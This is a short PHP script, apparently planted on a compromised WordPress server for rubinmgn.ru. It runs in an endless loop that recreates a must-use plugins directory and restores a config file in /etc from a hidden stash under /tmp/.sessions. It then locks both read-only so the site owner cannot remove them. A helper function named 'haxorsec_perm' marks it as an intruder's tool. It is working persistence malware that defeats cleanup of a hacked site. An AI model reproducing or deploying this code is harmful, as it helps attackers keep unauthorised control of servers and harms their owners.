
<?php
@ini_set("max_execution_time", 0);
while (True){
    if (!file_exists("/mnt/wd500/var/www/rubinmgn.ru/wp-content/mu-plugins")){
        mkdir("/mnt/wd500/var/www/rubinmgn.ru/wp-content/mu-plugins");
    }
    if (!file_exists("/etc/setup-config.php")){
        $text = base64_encode(file_get_contents("/tmp/.sessions/.L2V0Y3NldHVwLWNvbmZpZy10ZXh0"));
        file_put_contents("/etc/setup-config.php", base64_decode($text));
    }
    if (haxorsec_perm("/etc/setup-config.php") != 0444){
        chmod("/etc/setup-config.php", 0444);
    }
    if (haxorsec_perm("/mnt/wd500/var/www/rubinmgn.ru/wp-content/mu-plugins") != 0555){
        chmod("/mnt/wd500/var/www/rubinmgn.ru/wp-content/mu-plugins", 0555);
    }
}

function haxorsec_perm($flename){
    return substr(sprintf("%o", fileperms($flename)), -4);
}
